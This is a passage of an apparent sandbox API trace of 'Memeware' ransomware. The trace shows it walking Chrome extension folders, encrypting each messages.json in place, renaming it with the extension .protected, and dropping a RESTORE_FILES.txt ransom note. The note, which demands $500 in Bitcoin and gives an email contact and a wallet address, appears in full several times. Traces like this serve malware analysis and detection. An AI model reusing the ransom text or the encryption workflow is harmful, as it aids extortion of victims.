HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.protected")) returned 1 [0081.409] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.409] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.409] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\RESTORE_FILES.txt") returned 159 [0081.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.410] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.410] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.411] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.411] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.411] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.411] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.411] CloseHandle (hObject=0x164) returned 1 [0081.411] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.411] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0081.411] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0081.411] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0081.411] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0081.412] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0081.412] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil") returned 142 [0081.412] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0081.412] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0081.412] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\*") returned 144 [0081.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.413] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.413] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.413] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.413] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.413] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.413] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\.") returned 144 [0081.413] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.413] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.413] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.413] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.413] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.413] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.413] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.413] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\..") returned 145 [0081.413] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.413] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.413] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.413] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.413] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.413] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.413] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.414] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.414] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json") returned 156 [0081.414] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.414] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.414] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.414] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json") returned 156 [0081.415] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json") returned 156 [0081.415] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json") returned 156 [0081.415] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.415] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0081.416] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.416] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0081.416] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.416] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.417] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.417] CloseHandle (hObject=0x168) returned 1 [0081.417] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.protected") returned 166 [0081.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.protected")) returned 1 [0081.418] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.418] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.418] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\RESTORE_FILES.txt") returned 160 [0081.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.418] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.418] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.419] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.419] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.420] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.420] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.420] CloseHandle (hObject=0x164) returned 1 [0081.420] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.420] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0081.420] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0081.420] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0081.420] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0081.420] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0081.420] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr") returned 141 [0081.420] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0081.420] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0081.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\*") returned 143 [0081.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.420] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.420] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.420] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.420] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.420] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\.") returned 143 [0081.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.420] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.421] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.421] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.421] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.421] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.421] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\..") returned 144 [0081.421] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.421] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.421] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.421] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.421] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.421] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json") returned 155 [0081.421] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.421] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.421] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.421] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json") returned 155 [0081.422] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json") returned 155 [0081.422] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json") returned 155 [0081.422] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.422] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10c, lpOverlapped=0x0) returned 1 [0081.423] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.423] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10c, lpOverlapped=0x0) returned 1 [0081.423] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.423] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.423] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.423] CloseHandle (hObject=0x168) returned 1 [0081.423] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.protected") returned 165 [0081.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.protected" (normalized: 